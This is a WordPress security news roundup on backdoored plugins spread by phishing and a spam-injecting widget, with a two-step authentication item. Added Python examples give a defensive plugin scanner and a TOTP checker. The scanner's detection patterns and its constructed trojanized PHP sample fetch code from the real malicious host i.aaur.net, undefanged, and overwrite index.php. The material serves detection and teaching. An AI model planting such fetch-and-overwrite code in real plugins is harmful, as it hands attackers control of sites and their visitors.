WordPress Plugins containing Backdoor distributed via phishing emails

What would you do if, as a WordPress user, you received an email offering the Pro version of a WordPress plugin for free? Don't be tempted by such emails; they also hand out malicious code for free!

Sucuri has reported phishing emails asking its clients to download a Pro version of the "All in One SEO Pack" WordPress plugin. The email claims that the plugin is worth $79.00 and is being given away for free.

"You have been chosen by WordPress to take part in our Customer Rewarding Program.  You are the 23rd from 100 uniques winners," the phishing email reads.

Image credit: Sucuri

The download link in the email does not point to the WordPress plugin repository; it points to a zip file hosted on a compromised website.

Security researchers at Sucuri analyzed the plugin and found that it had been modified to include a backdoor that gives attackers full access to the server.

The malicious code in the plugin replaces the site's index.php file with malicious code retrieved from the attacker's server. When users visit the site, they are redirected either to spam sites or to exploit kits that infect the visitor's system.

Infected Social Media Widget plugin puts spam links in thousands of WordPress sites

If you are using the Social Media Widget plugin on your WordPress site, remove it immediately. Sucuri has discovered that the plugin is being used to inject spam into the sites running it.

The Social Media Widget is a simple sidebar widget that lets users enter their social media profile URLs and other subscription options; it shows an icon in the sidebar for each social media site, which opens in a separate browser window.

It is one of the more popular plugins, with more than 935,000 downloads, which means thousands of WordPress sites are affected.

According to Sucuri's malware report, the plugin contains a hidden call to a malicious URL, "hxxp://i.aaur.net/i.php", which is used to inject "Pay Day Loan" spam into the websites running the plugin.

The malicious code was added only in the latest version of the plugin, SMW 4.0. Users are advised to remove the plugin from their sites. The plugin has been removed from the WordPress Plugin repository.
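Both stories above describe the same defender's problem: a plugin file that quietly fetches content from an attacker-controlled host and, in the first case, overwrites the site's index.php. The following script is an added example, not code from Sucuri or from either plugin. It scans a plugin directory for a few constructed heuristics (runtime fetches from remote URLs, obfuscation helpers, writes to index.php, and the host named in the Sucuri report) and checks index.php against a known-good SHA-256. The plugin samples and the "good" index.php are constructed for the example; the pattern names and the `scan_source`, `scan_plugin_dir` and `index_is_unmodified` functions are this example's own, not part of any real tool.

```python
import hashlib
import re
from pathlib import Path

# Heuristics a defender might apply to plugin source. They are constructed for this
# example and are not Sucuri's detection rules. Each pattern maps to a finding name.
SUSPICIOUS_PATTERNS = {
    # PHP fetching code or content from a remote URL at runtime
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    # common obfuscation helpers used to hide an injected payload
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # overwriting the site's index.php, the behaviour described in the Sucuri report
    "index_rewrite": re.compile(r"\bfile_put_contents\s*\([^,]*index\.php", re.I),
}

# Indicator taken from the Sucuri report quoted in the article (shown there defanged as hxxp://i.aaur.net/i.php)
KNOWN_BAD_HOSTS = ("i.aaur.net",)


def scan_source(php_source: str) -> list:
    """Return a list of (finding_name, matched_text) tuples for one PHP file's contents."""
    findings = []
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        for match in pattern.finditer(php_source):
            findings.append((name, match.group(0)))
    for host in KNOWN_BAD_HOSTS:
        if host in php_source:
            findings.append(("known_bad_host", host))
    return findings


def scan_plugin_dir(root) -> dict:
    """Scan every .php file under a plugin directory; return {relative_path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        findings = scan_source(path.read_text(errors="replace"))
        if findings:
            report[str(path.relative_to(root))] = findings
    return report


def index_is_unmodified(index_bytes: bytes, expected_sha256: str) -> bool:
    """Compare index.php against a known-good SHA-256 recorded before deployment."""
    return hashlib.sha256(index_bytes).hexdigest() == expected_sha256


# Constructed samples, not real plugin code. CLEAN_PLUGIN mimics a benign widget;
# TROJANIZED_PLUGIN mimics the behaviour the report describes: fetch from the
# attacker's host and overwrite index.php.
CLEAN_PLUGIN = """<?php
/* Plugin Name: Example Social Widget (constructed sample) */
function example_widget_render($url) {
    echo '<a href="' . esc_url($url) . '" target="_blank">profile</a>';
}
add_action('widgets_init', 'example_widget_render');
"""

TROJANIZED_PLUGIN = """<?php
/* Plugin Name: Example SEO Pack Pro (constructed sample) */
function example_pro_init() {
    $payload = file_get_contents('http://i.aaur.net/i.php');
    file_put_contents(ABSPATH . 'index.php', $payload);
    $cfg = base64_decode('e30=');
}
add_action('init', 'example_pro_init');
"""

# A constructed stand-in for the index.php WordPress ships, and its recorded digest.
GOOD_INDEX = b"<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
GOOD_INDEX_SHA256 = hashlib.sha256(GOOD_INDEX).hexdigest()


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "clean.php").write_text(CLEAN_PLUGIN)
        (Path(tmp) / "trojan.php").write_text(TROJANIZED_PLUGIN)
        for file, findings in scan_plugin_dir(tmp).items():
            print(file)
            for name, text in findings:
                print(f"  {name}: {text}")
    print("index.php intact:", index_is_unmodified(GOOD_INDEX, GOOD_INDEX_SHA256))
```

Run against a real `wp-content/plugins` tree the scanner only raises candidates for review; legitimate plugins also call `file_get_contents` or `base64_decode`, so the value is in the combination of findings and in the hash check, which catches a rewritten index.php regardless of how the payload was fetched.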

WordPress.com boosts security with two-step authentication

WordPress.com, a blog hosting service, has announced that it has enabled a two-step authentication feature to keep your account secure.

Two-factor authentication is a security feature that prompts you to enter a temporary secret number sent to your phone whenever you log in to your account.

How to enable two-step authentication in WordPress?
To enable this feature, go to the new Security tab in your WordPress.com account settings and go through the setup wizard.
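The "temporary secret number" described above is, when delivered through an authenticator app rather than by SMS, a time-based one-time password (TOTP, RFC 6238). The code below is an added example of how the server side of that check works; it is not WordPress.com's implementation and assumes the authenticator-app variant (a shared secret, 30-second steps, HMAC-SHA1, six digits). The function names `totp`, `verify_totp` and `new_shared_secret` are this example's own.

```python
import base64
import hashlib
import hmac
import secrets
import struct
import time


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time-step counter, then RFC 4226 dynamic truncation."""
    counter = unix_time // step
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    truncated = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(truncated % (10 ** digits)).zfill(digits)


def verify_totp(secret: bytes, submitted: str, unix_time: int, window: int = 1, step: int = 30) -> bool:
    """Accept the code for the current step and `window` steps either side (phone clock drift).

    The comparison is constant-time so a wrong guess cannot be distinguished by timing."""
    for drift in range(-window, window + 1):
        candidate = totp(secret, unix_time + drift * step, step=step)
        if hmac.compare_digest(candidate, submitted):
            return True
    return False


def new_shared_secret() -> tuple:
    """Create a fresh random secret; the Base32 form is what the authenticator app is given."""
    raw = secrets.token_bytes(20)
    return raw, base64.b32encode(raw).decode("ascii")


# RFC 6238 Appendix B reference secret for SHA-1 (a published test value, not a real credential)
RFC_TEST_SECRET = b"12345678901234567890"


if __name__ == "__main__":
    raw, provisioning = new_shared_secret()
    now = int(time.time())
    code = totp(raw, now)
    print("share with the phone (Base32):", provisioning)
    print("code right now:", code, "accepted:", verify_totp(raw, code, now))
    # Three steps later the code is outside the +/-1 step window and must be rejected.
    print("same code 90 s later accepted:", verify_totp(raw, code, now + 90))
```

The window is the practical trade-off: one step either side tolerates a phone whose clock is slightly off, while a code more than 30 seconds stale is refused, which is what makes the number "temporary". A real deployment would also record the last accepted counter so that a code cannot be replayed within its window.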

"We know your blog is important to you, and today we're proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure," the WordPress.com blog post reads.